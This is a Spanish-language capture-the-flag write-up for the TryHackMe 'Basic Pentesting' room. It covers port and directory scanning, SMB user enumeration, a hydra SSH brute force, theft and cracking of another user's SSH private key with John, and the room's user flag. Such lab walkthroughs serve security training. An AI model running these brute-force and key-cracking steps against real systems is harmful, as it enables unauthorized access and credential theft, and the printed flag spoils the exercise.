Basic Pentesting - TryHackMe
“Basic Pentesting” is a beginner level pentesting room in TryHackMe which covers very basic pentesting techniques.
Summary
- IP: 10.10.116.216
- Ports: 22,80,139,445,8009,8080
- OS: Linux (Ubuntu)
- Services & Applications:
- 22 -> OpenSSH 7.2p2 Ubuntu 4ubuntu2.4
- 80 -> Apache httpd 2.4.18
- 139 -> netbios-ssn Samba smbd 3.X - 4.X
- 445 -> netbios-ssn Samba smbd 4.3.11-Ubuntu
- 8009 -> Apache Jserv (Protocol v1.3)
- 8080 -> Apache Tomcat 9.0.7
Recon
- Reconocimiento básico de puertos:
$sudo nmap -p- -sS --open --min-rate 5000 -vvv -n -Pn 10.10.116.216 -oG allPorts
- Reconocimiento profundo de puertos encontrados:
$sudo nmap -p22,80,139,445,8009,8080 -sCV 10.10.116.216 -oN targeted
- Análisis de directorios con gobuster:
$gobuster dir -u http://10.10.116.216:80 -w /home/dante/SecLists/Discovery/Web-Content/common.txt
- Encontramos el directorio /development, el cual contiene dos ficheros:
dev.txt
j.txt
- Realizamos un escaneo de log del protocolo smb:
$enum4linux.pl -a 10.10.116.216 | tee enum4linux.log
- Encontramos los siguientes usuarios:
\kay
\jan
- Con los usuarios encontrados, aplicamos fuerza bruta con hydra para intentar encontrar la contraseña para entrar vía ssh:
$hydra -l jan -P /home/dante/SecLists/Passwords/Leaked-Databases/rockyou.txt ssh://10.10.116.216
- Accedemos como usuario jan:
$ssh jan@10.10.116.216
- Buscamos información que nos sirva para escalar privilegios o pivotear usuarios; encontramos un archivo ./kay/.ssh/id_rsa el cual contiene la private key ssh del usuario kay, la desciframos con John:
- Primero copiamos el contenido exacto del archivo id_rsa y lo guardamos en un archivo pass
- Ejecutamos
$python3 ssh2john.py pass > pass.txt
- Luego crackeamos con John:
$john -w:/home/dante/SecLists/Passwords/Leaked-Databases/rockyou.txt pass.txt
- Con la contraseña obtenida, accedemos via SSH con la private key anteriormente almacenada como pass:
$ssh -i passs kay@10.10.116.216
- Encontramos la flag de usuario: heresareallystrongpasswordthatfollowsthepasswordpolicy$$